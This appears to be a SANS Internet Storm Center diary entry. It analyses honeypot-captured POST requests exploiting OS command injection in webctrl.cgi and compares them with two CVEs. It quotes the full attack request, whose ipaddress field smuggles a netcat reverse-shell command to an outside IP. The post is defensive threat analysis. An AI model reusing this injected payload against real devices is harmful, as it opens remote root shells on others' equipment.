Starting yesterday, some of our honeypots received POST requests to "/cgi-bin/webctrl.cgi", attempting to exploit an OS command injection vulnerability:

POST /cgi-bin/webctrl.cgi
Host: [honeypot ip]:80
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: es-MX,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 186
Origin: http://[honeypot ip]:80
Dnt: 1
Connection: close
Referer: http://[honeypot ip]:80/cgi-bin/webctrl.cgi?action=pingconfig_page
Cookie: userName=admin; state=login; passWord=
Upgrade-Insecure-Requests: 1

action=pingconfig_update&pos_x=0&pos_y=0&login=3&configchanged=0&ip_address=&pingstatereloadflag=1&ipv6=1&ipaddress=;nc%2087.120.191.94%2031331%20-e/bin/sh;&count=3&size=64&start=Start

The vulnerability appears to be a "classic" OS command injection vulnerability. The "ipaddress" parameter is likely passed straight to "ping" in code like 

ping -c {count} -s {size} {ipaddress}

The count and size parameters are easy to validate as they are numbers. The ipaddress parameter is likely supposed to allow for hostnames, making validation a little bit trickier. I talked at length about OS command injection and how to prevent it in a video last year (see https://www.youtube.com/watch?v=7QDO3pZbum8 )

Identifying the exact vulnerability this request attempts to exploit is not so straightforward.

Searching the National Vulnerability Database (https://nvd.nist.gov) leads to two different vulnerabilities for "webctrl.cgi":

CVE-2021-40351: webctrl.cgi.elf on Christie Digital DWU850-GS V06.46 devices allows attackers to perform any desired action via a crafted query containing an unspecified Cookie header. Authentication bypass can be achieved by including an administrative cookie that the device does not validate.

CVE-2025-34033: An OS command injection vulnerability exists in the Blue Angel Software Suite running on embedded Linux devices via the ping_addr parameter in the webctrl.cgi script. The application fails to properly sanitize input before passing it to the system-level ping command.

The first one refers to a cookie header. We would have an "interesting" cookie header, but the exploited vulnerability appears to affect the "pingconfig_update" action, pointing to CVE-2025-34033. However, the detailed description states:

An OS command injection vulnerability exists in the Blue Angel Software Suite running on embedded Linux devices via the ping_addr parameter in the webctrl.cgi script. The application fails to properly sanitize input before passing it to the system-level ping command. An authenticated attacker can inject arbitrary commands by appending shell metacharacters to the ping_addr parameter in a crafted GET request to /cgi-bin/webctrl.cgi?action=pingtest_update. The command's output is reflected in the application's web interface, enabling attackers to view results directly. Default and backdoor credentials can be used to access the interface and exploit the issue. Successful exploitation results in arbitrary command execution as the root user.

Our attack uses the 'ipaddress' parameter, not the 'ping_addr' parameter. The NVD entry also suggests this requires a GET entry and an action set to 'pingtest_update', not a POST entry with an action of 'pingconfig_update'.

There are sadly many similar vulnerabilities. Many IoT/Router appliances have had vulnerabilities in their "ping" implementation in the past that looked exactly like what we have here. In 2019, an exploit was published for CVE-2025-34033 [1]. The vendor behind the software, 5VTech, appears to specialize in VoIP and similar equipment for Broadband networks [2].

There are two options at this point: (a) this is a new version of the CVE-2025-34033 vulnerability, or (b) the attacker messed up. Without a test device, this isn't easy to verify.

[1]https://www.exploit-db.com/exploits/46792
[2] http://www.5vtechnologies.com/

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|